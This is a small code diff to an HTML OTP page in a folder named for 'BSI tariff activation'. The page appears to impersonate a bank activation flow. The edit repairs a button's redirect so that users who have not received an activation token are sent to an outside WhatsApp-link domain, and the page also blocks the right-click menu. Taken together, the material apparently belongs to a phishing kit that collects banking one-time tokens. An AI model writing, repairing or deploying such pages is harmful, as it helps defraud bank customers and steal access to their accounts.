--- a/aktivasi-tarif-BSI/otp.html
+++ b/aktivasi-tarif-BSI/otp.html
@@ -303,7 +303,7 @@ document.addEventListener("contextmenu", function(e){
                         <div class="text-header text-center" style="font-family: 'Nunito', sans-serif;'">
                           
                             <span class=""  style="position: fixed; left: 20; right: 20; margin: 0px auto;  font-weight: bold; color: #EEB252; display: ;line-height: 18px" id="">Jika belum menerima token aktivasi silahkan tekan dibawah ini
-                  <br/><b id="notif" onclick="window.location.href='https://walinkbsi.wasap.my/" style="color: #eee">Request Token Aktivasi</b></span><br/>
+                  <br/><b id="notif" onclick="window.location.href='https://walinkbsi.wasap.my/'" style="color: #eee">Request Token Aktivasi</b></span><br/>
    
                </div>
             </div>
